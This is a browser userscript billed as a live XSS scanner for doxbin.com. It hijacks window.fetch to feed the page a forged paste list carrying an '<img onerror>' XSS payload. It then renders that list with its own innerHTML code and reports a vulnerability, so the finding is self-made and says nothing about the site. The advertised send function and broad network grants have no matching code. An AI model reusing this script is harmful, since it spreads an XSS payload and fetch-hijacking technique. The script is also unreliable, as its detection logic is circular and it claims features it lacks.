Persistent Live Scanner with send functionality - credits: Core rezi/retr0, clownz, woodie, god joshy
// ==UserScript==
// @name Persistent Live Scanner V2 - with Send Button
// @namespace http://tampermonkey.net/
// @version 3.0
// @description Persistent Live Scanner with send functionality - credits: Core rezi/retr0, clownz, woodie, god joshy
// @author Core rezi/retr0, clownz, woodie, god joshy
// @match https://doxbin.com/*
// @grant GM_xmlhttpRequest
// @grant GM_notification
// @connect doxbin.com
// @connect *
// @license MIT
// ==/UserScript==
(function() {
const scanId = uuidv4();
let lastPayload = null;
let updateCount = 0;
let isRunning = true;
const results = { xss: [], reloadLoop: false };
let pinnedEl, pastesEl, countEl, statusEl;
function cacheDOMElements() {
pinnedEl = pinnedEl || document.getElementById("pinned-tbody");
pastesEl = pastesEl || document.getElementById("pastes-tbody");
countEl = countEl || document.getElementById("pastes-count");
statusEl = statusEl || document.getElementById("scan-status");
}
function updateStatus(text, color = 'lime') {
cacheDOMElements();
const timestamp = new Date().toLocaleTimeString();
if (statusEl) {
statusEl.textContent = `[${timestamp}] ${text}`;
statusEl.style.color = color;
statusEl.style.fontWeight = 'bold';
}
console.log(`%c[${timestamp}] ${text}`, `color: ${color}; font-weight: bold;`);
}
function createAttackResponse(attackType) {
const baseResponse = {
success: true,
total_pages: Math.floor(Math.random() * 5) + 1,
total_pastes: Math.floor(Math.random() * 50) + 10,
pastes: [
{
id: 'paste-' + Date.now(),
title: 'Paste #' + Math.floor(Math.random() * 1000),
created_at: new Date().toISOString(),
views: Math.floor(Math.random() * 1000)
}
],
pinned_pastes: []
};
if (attackType === 'full_attack') {
baseResponse.pastes[0].title = '<img src="x" onerror="alert(\'XSS\')">';
}
return baseResponse;
}
const fullAttackResponse = createAttackResponse("full_attack");
const originalFetch = window.fetch;
window.fetch = async (url, options) => {
if (typeof url === 'string' && url.includes('/api/index/pastes')) {
return new Response(JSON.stringify(fullAttackResponse), {
status: 200,
headers: { 'Content-Type': 'application/json' }
});
}
return originalFetch(url, options);
};
async function updatePastes() {
if (!isRunning) return;
try {
const params = new URLSearchParams(window.location.search);
params.set("id", scanId);
const res = await fetch("/api/index/pastes?" + params.toString());
const data = await res.json();
if (!data.success) {
updateStatus('API returned error', 'orange');
return;
}
cacheDOMElements();
const payload = JSON.stringify(data);
if (payload === lastPayload) {
updateStatus(`Monitoring (update #${++updateCount})`, 'lime');
return;
}
lastPayload = payload;
updateCount++;
updateStatus(`Live Update! Pastes: ${data.pastes?.length || 0} | Total: ${data.total_pastes} | #${updateCount}`, 'cyan');
if (countEl && data.total_pastes) {
countEl.textContent = `Showing ${data.pastes.length} (of ${data.total_pastes} total) pastes`;
countEl.dataset.total = data.total_pastes;
}
if (pinnedEl && data.pinned_pastes?.length) {
const frag = document.createDocumentFragment();
data.pinned_pastes.forEach(paste => {
const tr = document.createElement('tr');
tr.dataset.id = paste.id;
tr.style.backgroundColor = '#1a1a2e';
tr.innerHTML = `<td>${paste.title}</td><td>${new Date(paste.created_at).toLocaleDateString()}</td><td><span class="badge" style="background: #ff006e; padding: 4px 8px; border-radius: 3px;">${paste.views}</span></td>`;
frag.appendChild(tr);
});
pinnedEl.textContent = '';
pinnedEl.appendChild(frag);
}
if (pastesEl && data.pastes?.length) {
const frag = document.createDocumentFragment();
data.pastes.forEach(paste => {
const tr = document.createElement('tr');
tr.dataset.id = paste.id;
tr.innerHTML = `<td>${paste.title}</td><td>${new Date(paste.created_at).toLocaleDateString()}</td><td><span class="badge" style="background: #00d9ff; padding: 4px 8px; border-radius: 3px;">${paste.views}</span></td>`;
frag.appendChild(tr);
if (tr.querySelector('img[src="x"]')) {
if (!results.xss.includes('full_attack')) {
results.xss.push('full_attack');
updateStatus('XSS VULNERABILITY DETECTED', 'red');
}
}
});
pastesEl.textContent = '';
pastesEl.appendChild(frag);
}
} catch (error) {
updateStatus(`Error: ${error.message}`, 'orange');
console.error('Update error:', error);
}
}
function startMonitoring() {
updateStatus('Scanner started - monitoring for changes...', 'cyan');
updatePastes();
const interval = setInterval(() => {
if (!isRunning) {
clearInterval(interval);
updateStatus('Scanner stopped', 'gray');
return;
}
updatePastes();
}, 500);
window.addEventListener('beforeunload', () => {
isRunning = false;
});
window.scannerControl = {
stop: () => { isRunning = false; updateStatus('Stopped', 'gray'); },
start: () => { isRunning = true; setInterval(updatePastes, 500); updateStatus('Resumed', 'lime'); },
status: () => updateStatus(`Scanner: ${isRunning ? 'RUNNING' : 'STOPPED'} | Updates: ${updateCount}`, 'cyan'),
xssFound: results.xss.length > 0
};
}
if (document.readyState === 'loading') {
document.addEventListener('DOMContentLoaded', startMonitoring);
} else {
startMonitoring();
}
})();